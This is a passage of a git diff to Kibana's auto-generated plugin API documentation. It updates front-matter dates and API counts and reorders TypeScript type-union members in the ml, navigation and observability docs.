'apidocs', 'kibana', 'maps'] --- import mapsObj from './maps.devdocs.json'; @@ -21,7 +21,7 @@ Contact [GIS](https://github.com/orgs/elastic/teams/kibana-gis) for questions re | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 255 | 0 | 252 | 25 | +| 256 | 0 | 255 | 25 | ## Client diff --git a/api_docs/maps_ems.mdx b/api_docs/maps_ems.mdx index 08d27dfc5d9e0..6434377f36f50 100644 --- a/api_docs/maps_ems.mdx +++ b/api_docs/maps_ems.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/mapsEms title: "mapsEms" image: https://source.unsplash.com/400x175/?github description: API docs for the mapsEms plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'mapsEms'] --- import mapsEmsObj from './maps_ems.devdocs.json'; diff --git a/api_docs/ml.devdocs.json b/api_docs/ml.devdocs.json index 234dc00a385fc..2e5a2b35f7c3a 100644 --- a/api_docs/ml.devdocs.json +++ b/api_docs/ml.devdocs.json @@ -1262,7 +1262,7 @@ }, " extends Pick<", "UseDataGridReturnType", - ", \"status\" | \"baseline\" | \"rowCount\" | \"errorMessage\" | \"chartsVisible\" | \"chartsButtonVisible\" | \"ccsWarning\" | \"columnsWithCharts\" | \"invalidSortingColumnns\" | \"noDataMessage\" | \"onChangeItemsPerPage\" | \"onChangePage\" | \"onSort\" | \"pagination\" | \"setPagination\" | \"setVisibleColumns\" | \"rowCountRelation\" | \"sortingColumns\" | \"tableItems\" | \"toggleChartVisibility\" | \"visibleColumns\" | \"predictionFieldName\" | \"resultsField\">" + ", \"status\" | \"rowCount\" | \"errorMessage\" | \"baseline\" | \"chartsVisible\" | \"chartsButtonVisible\" | \"ccsWarning\" | \"columnsWithCharts\" | \"invalidSortingColumnns\" | \"noDataMessage\" | \"onChangeItemsPerPage\" | \"onChangePage\" | \"onSort\" | \"pagination\" | \"setPagination\" | \"setVisibleColumns\" | \"rowCountRelation\" | \"sortingColumns\" | \"tableItems\" | \"toggleChartVisibility\" | \"visibleColumns\" | \"predictionFieldName\" | \"resultsField\">" ], "path": "x-pack/plugins/ml/public/application/components/data_grid/types.ts", "deprecated": false, diff --git a/api_docs/ml.mdx b/api_docs/ml.mdx index 19deff4d4fb3f..7f818d563723c 100644 --- a/api_docs/ml.mdx +++ b/api_docs/ml.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/ml title: "ml" image: https://source.unsplash.com/400x175/?github description: API docs for the ml plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'ml'] --- import mlObj from './ml.devdocs.json'; diff --git a/api_docs/monitoring.mdx b/api_docs/monitoring.mdx index 598255847b9a6..8d6d469746768 100644 --- a/api_docs/monitoring.mdx +++ b/api_docs/monitoring.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/monitoring title: "monitoring" image: https://source.unsplash.com/400x175/?github description: API docs for the monitoring plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'monitoring'] --- import monitoringObj from './monitoring.devdocs.json'; diff --git a/api_docs/monitoring_collection.mdx b/api_docs/monitoring_collection.mdx index a489ebc9a156e..3c7ee3e38fc86 100644 --- a/api_docs/monitoring_collection.mdx +++ b/api_docs/monitoring_collection.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/monitoringCollection title: "monitoringCollection" image: https://source.unsplash.com/400x175/?github description: API docs for the monitoringCollection plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'monitoringCollection'] --- import monitoringCollectionObj from './monitoring_collection.devdocs.json'; diff --git a/api_docs/navigation.devdocs.json b/api_docs/navigation.devdocs.json index 5e8590af0ad15..2e6c408e26aca 100644 --- a/api_docs/navigation.devdocs.json +++ b/api_docs/navigation.devdocs.json @@ -411,13 +411,13 @@ "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -427,13 +427,13 @@ "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -445,15 +445,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -463,15 +463,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -483,15 +483,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -503,7 +503,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -511,7 +511,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -521,7 +521,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -529,7 +529,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -541,7 +541,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -549,7 +549,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", diff --git a/api_docs/navigation.mdx b/api_docs/navigation.mdx index 6294e351203b5..9c4935b2316b7 100644 --- a/api_docs/navigation.mdx +++ b/api_docs/navigation.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/navigation title: "navigation" image: https://source.unsplash.com/400x175/?github description: API docs for the navigation plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'navigation'] --- import navigationObj from './navigation.devdocs.json'; diff --git a/api_docs/newsfeed.mdx b/api_docs/newsfeed.mdx index 8a3e8514ed154..1ddeac3685504 100644 --- a/api_docs/newsfeed.mdx +++ b/api_docs/newsfeed.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/newsfeed title: "newsfeed" image: https://source.unsplash.com/400x175/?github description: API docs for the newsfeed plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'newsfeed'] --- import newsfeedObj from './newsfeed.devdocs.json'; diff --git a/api_docs/observability.devdocs.json b/api_docs/observability.devdocs.json index ec992224fa207..6e22546cd3174 100644 --- a/api_docs/observability.devdocs.json +++ b/api_docs/observability.devdocs.json @@ -696,11 +696,11 @@ }, " | undefined; list: () => string[]; }; selectedAlertId?: string | undefined; } & ", "CommonProps", - " & { as?: \"div\" | undefined; } & _EuiFlyoutProps & Omit, HTMLDivElement>, keyof _EuiFlyoutProps> & Omit, HTMLDivElement>, \"key\" | \"css\" | keyof React.HTMLAttributes> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }, \"children\" | \"color\" | \"id\" | \"lang\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | keyof ", + " & { as?: \"div\" | undefined; } & _EuiFlyoutProps & Omit, HTMLDivElement>, keyof _EuiFlyoutProps> & Omit, HTMLDivElement>, \"key\" | \"css\" | keyof React.HTMLAttributes> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }, \"children\" | \"onError\" | \"hidden\" | \"color\" | \"title\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"id\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"as\" | keyof ", "CommonProps", - " | \"title\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"as\" | keyof React.ClassAttributes | keyof _EuiFlyoutProps>, \"children\" | \"color\" | \"id\" | \"lang\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | 